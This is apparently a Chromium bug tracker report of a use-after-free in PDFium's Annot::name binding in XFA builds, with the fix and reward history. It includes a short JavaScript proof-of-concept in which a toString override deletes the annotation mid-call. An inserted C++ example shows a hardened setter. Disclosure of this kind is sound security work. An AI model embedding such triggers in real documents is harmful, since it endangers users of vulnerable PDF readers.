Security: Use after free in PDFium's Annot::name
Reported by de...@eng.ucsd.edu, Jan 10 2017
Issue description

VULNERABILITY DETAILS
Use after free in PDFium

VERSION
Chromium 56.0.2915.0 (Developer Build) (64-bit)
Revision 9c88c589fdf91ce439627b8eb897cce07552f36c-refs/heads/master@{#431175}
JavaScript V8 5.6.267
Operating System OSX 10.12.1
PDFium with XFA enabled

REPRODUCTION CASE
We have attached the PDF that triggers this bug in addition to the source for that PDF. We create the attached PDF by compiling the source with PDFLatex and then adding an XFA element to the resulting PDF (with a custom program that uses the iText library), which makes it an XFA PDF.

The UAF takes place in PDFium's C++ bindings for its JavaScript API:
(https://cs.chromium.org/chromium/src/third_party/pdfium/fpdfsdk/javascript/Annot.cpp?sq=package:chromium&l=70)

  // vp is a CJS_PropValue, a JavaScript object controlled by the user
  bool Annot::name(IJS_Context* cc, CJS_PropValue& vp, CFX_WideString& sError) {
    CPDFSDK_BAAnnot* baAnnot = ToBAAnnot(m_pAnnot.Get());
    if (!baAnnot)
      return false;
    ...
    CFX_WideString annotName;
    // When annotName is a WideString, the ">>" operator calls "ToCFXWideString"
    // with vp as the receiver. This, in turn, calls V8's "ToString" with our vp object.
    // We can override this function to delete baAnnot.
    vp >> annotName;
    // Since we deleted baAnnot in the previous call back into JavaScript, we are now
    // using it after it has been freed.
    baAnnot->SetAnnotName(annotName);
    ...
  }

To hit this C++ code, we embed the following JavaScript in an XFA pdf:

  function run() {
    const annots = this.getAnnots();
    // annots[0], in this case, corresponds to "vp" in the code above
    annots[0].name = {
      toString: () => {
        // remove the "myRadio" widget which removes "baAnnot"
        this.removeField("myRadio");
        gc();
        return false;
      }
    };
  }
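As an added example, not code from PDFium or from this report, the re-entrancy hazard described above modelled with hypothetical stand-in types (Host, Annot, ScriptValue, SetAnnotName): the setter converts the script value first and only then re-checks the annotation through a weak reference, so a toString() that removes the field is refused rather than dereferenced.

```cpp
// Added example, not PDFium code: a setter that calls back into script must
// assume the script can delete the object being edited, as the toString()
// override above does via removeField(). All names here are hypothetical.
#include <functional>
#include <map>
#include <memory>
#include <string>

struct Annot { std::string name; };

// Owns annotations by field name; RemoveField() plays the role of removeField().
struct Host {
  std::map<std::string, std::shared_ptr<Annot>> annots;
  void RemoveField(const std::string& field) { annots.erase(field); }
};

// A script value whose string conversion runs user-controlled code.
struct ScriptValue { std::function<std::string()> to_string; };

// Hardened setter: hold only a weak reference across the re-entrant call,
// convert the script value, then re-check that the annot still exists instead
// of dereferencing a raw pointer saved before the callback.
bool SetAnnotName(Host& host, const std::string& field, const ScriptValue& vp) {
  auto it = host.annots.find(field);
  if (it == host.annots.end()) return false;
  std::weak_ptr<Annot> weak = it->second;  // `it` must not be used after the callback
  std::string new_name = vp.to_string();   // may call host.RemoveField(field)
  std::shared_ptr<Annot> annot = weak.lock();
  if (!annot) return false;  // deleted during the callback: refuse the write
  annot->name = new_name;
  return true;
}

// Script deletes the annot mid-conversion: the setter reports failure and the
// annot is gone, with no dangling dereference.
bool HostileCallbackRejected() {
  Host host;
  host.annots["myRadio"] = std::make_shared<Annot>();
  ScriptValue vp{[&host] { host.RemoveField("myRadio"); return std::string("x"); }};
  return !SetAnnotName(host, "myRadio", vp) && host.annots.count("myRadio") == 0;
}

// Benign conversion: the rename is applied.
bool BenignCallbackApplied() {
  Host host;
  host.annots["myRadio"] = std::make_shared<Annot>();
  ScriptValue vp{[] { return std::string("renamed"); }};
  return SetAnnotName(host, "myRadio", vp) && host.annots["myRadio"]->name == "renamed";
}
```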
Jan 12 2017
Requires XFA as in bug 679642, so shipping Chromium is not affected.
Jan 12 2017
https://pdfium.googlesource.com/pdfium/+/192497124e7cde747ade7bf89028586eea293be5
Jan 12 2017
VRP: same caveats as in 679642, impact none only since we don't ship XFA.
Jan 12 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromium/src.git/+/34ff66f6a7ed64c19c9494b0327a7a4037b7b2ff

commit 34ff66f6a7ed64c19c9494b0327a7a4037b7b2ff
Author: pdfium-deps-roller <pdfium-deps-roller@chromium.org>
Date: Thu Jan 12 22:28:15 2017

Roll src/third_party/pdfium/ db7647083..98d00b230 (4 commits).

https://pdfium.googlesource.com/pdfium.git/+log/db7647083d0a..98d00b230aa1

$ git log db7647083..98d00b230 --date=short --no-merges --format='%ad %ae %s'
2017-01-12 dsinclair Remove used items from the CSS code.
2017-01-12 tsepez Don't put timers with ID == 0 into the global timer map.
2017-01-12 tsepez Custom toString() methods may delete annots.
2017-01-12 npm Fix leak in OJPEGReadHeaderInfoSecTablesAcTable when read fails.

BUG=679649,679643,680520

Documentation for the AutoRoller is here:
https://skia.googlesource.com/buildbot/+/master/autoroll/README.md

If the roll is causing failures, see:
http://www.chromium.org/developers/tree-sheriffs/sheriff-details-chromium#TOC-Failures-due-to-DEPS-rolls

TBR=dsinclair@chromium.org

Review-Url: https://codereview.chromium.org/2627073004
Cr-Commit-Position: refs/heads/master@{#443386}

[modify] https://crrev.com/34ff66f6a7ed64c19c9494b0327a7a4037b7b2ff/DEPS
Jan 23 2017
The panel awarded $3,500 for this one! Thanks!
Feb 24 2017
Should we add reward-3500 and other rewards related labels?
Mar 13 2017
Added! Note that the reward amount the panel decided upon was $3,000, but VRP error in your favour...!
Apr 21 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by de...@eng.ucsd.edu, Jan 11 2017